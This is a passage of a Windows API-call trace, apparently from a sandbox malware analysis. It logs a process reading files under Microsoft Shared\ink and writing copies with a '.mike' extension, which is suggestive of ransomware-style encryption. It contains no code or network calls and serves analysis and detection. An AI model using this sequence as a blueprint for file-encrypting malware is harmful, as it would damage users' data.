Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", lpFilePart=0x0) returned 0x42 [0043.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.717] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.717] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", lpFilePart=0x0) returned 0x42 [0043.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.717] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.718] GetFileType (hFile=0x264) returned 0x1 [0043.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.718] GetFileType (hFile=0x264) returned 0x1 [0043.718] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.718] WriteFile (in: hFile=0x264, lpBuffer=0x216fc14*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x216fc14*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.719] CloseHandle (hObject=0x264) returned 1 [0043.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.719] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), fInfoLevelId=0x0, lpFileInformation=0x216f758 | out: lpFileInformation=0x216f758*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd0)) returned 1 [0043.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.719] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.719] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.719] GetFileType (hFile=0x264) returned 0x1 [0043.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.719] GetFileType (hFile=0x264) returned 0x1 [0043.719] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.719] ReadFile (in: hFile=0x264, lpBuffer=0x2170d28, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2170d28*, lpNumberOfBytesRead=0x2af0c8*=0xbd0, lpOverlapped=0x0) returned 1 [0043.721] CloseHandle (hObject=0x264) returned 1 [0043.721] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", lpFilePart=0x0) returned 0x42 [0043.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.721] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.721] GetFileType (hFile=0x264) returned 0x1 [0043.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.722] GetFileType (hFile=0x264) returned 0x1 [0043.722] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.722] WriteFile (in: hFile=0x264, lpBuffer=0x2176af8*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2176af8*, lpNumberOfBytesWritten=0x2af0bc*=0xbd0, lpOverlapped=0x0) returned 1 [0043.722] CloseHandle (hObject=0x264) returned 1 [0043.723] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", lpFilePart=0x0) returned 0x42 [0043.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.723] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.723] GetFileType (hFile=0x264) returned 0x1 [0043.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.723] GetFileType (hFile=0x264) returned 0x1 [0043.724] WriteFile (in: hFile=0x264, lpBuffer=0x2179d0c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2179d0c*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.724] CloseHandle (hObject=0x264) returned 1 [0043.725] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.725] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", lpFilePart=0x0) returned 0x42 [0043.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.725] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4436cc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4436cc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4436cc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xdf0)) returned 1 [0043.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.725] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.725] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", lpFilePart=0x0) returned 0x42 [0043.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.725] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x217b3bc | out: lpFileInformation=0x217b3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4436cc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4436cc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4436cc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xdf0)) returned 1 [0043.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.725] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.725] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", dwFileAttributes=0x80) returned 0 [0043.726] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.726] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", lpFilePart=0x0) returned 0x42 [0043.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.726] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4436cc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4436cc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4436cc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xdf0)) returned 1 [0043.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.727] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.727] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", lpFilePart=0x0) returned 0x42 [0043.727] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.mike")) returned 1 [0043.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll", lpFilePart=0x0) returned 0x45 [0043.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.755] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.755] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.755] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.755] GetFileType (hFile=0x264) returned 0x1 [0043.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.756] GetFileType (hFile=0x264) returned 0x1 [0043.756] CloseHandle (hObject=0x264) returned 1 [0043.756] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.756] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.756] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.756] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.756] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), fInfoLevelId=0x0, lpFileInformation=0x217f4b8 | out: lpFileInformation=0x217f4b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c9602b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c9602b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa62)) returned 1 [0043.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.756] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.756] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), fInfoLevelId=0x0, lpFileInformation=0x217f7a8 | out: lpFileInformation=0x217f7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c9602b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c9602b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa62)) returned 1 [0043.757] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.757] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", lpFilePart=0x0) returned 0x42 [0043.757] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.757] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.757] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.757] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.757] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", lpFilePart=0x0) returned 0x42 [0043.757] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.757] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", lpFilePart=0x0) returned 0x42 [0043.757] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.758] GetFileType (hFile=0x264) returned 0x1 [0043.758] GetFileType (hFile=0x264) returned 0x1 [0043.758] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.758] WriteFile (in: hFile=0x264, lpBuffer=0x21804fc*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21804fc*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.759] CloseHandle (hObject=0x264) returned 1 [0043.759] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), fInfoLevelId=0x0, lpFileInformation=0x2180040 | out: lpFileInformation=0x2180040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c9602b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c9602b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa62)) returned 1 [0043.759] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpFilePart=0x0) returned 0x3d [0043.759] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.759] GetFileType (hFile=0x264) returned 0x1 [0043.760] GetFileType (hFile=0x264) returned 0x1 [0043.760] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.760] ReadFile (in: hFile=0x264, lpBuffer=0x2181610, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2181610*, lpNumberOfBytesRead=0x2af0c8*=0xa62, lpOverlapped=0x0) returned 1 [0043.761] CloseHandle (hObject=0x264) returned 1 [0043.762] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", lpFilePart=0x0) returned 0x42 [0043.762] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.762] GetFileType (hFile=0x264) returned 0x1 [0043.762] GetFileType (hFile=0x264) returned 0x1 [0043.762] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.762] WriteFile (in: hFile=0x264, lpBuffer=0x218832c*, nNumberOfBytesToWrite=0xa70, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x218832c*, lpNumberOfBytesWritten=0x2af0bc*=0xa70, lpOverlapped=0x0) returned 1 [0043.762] CloseHandle (hObject=0x264) returned 1 [0043.763] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike", lpFilePart=0x0) returned 0x42 [0043.763] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.763] GetFileType (hFile=0x264) returned 0x1 [0043.763] GetFileType (hFile=0x264) 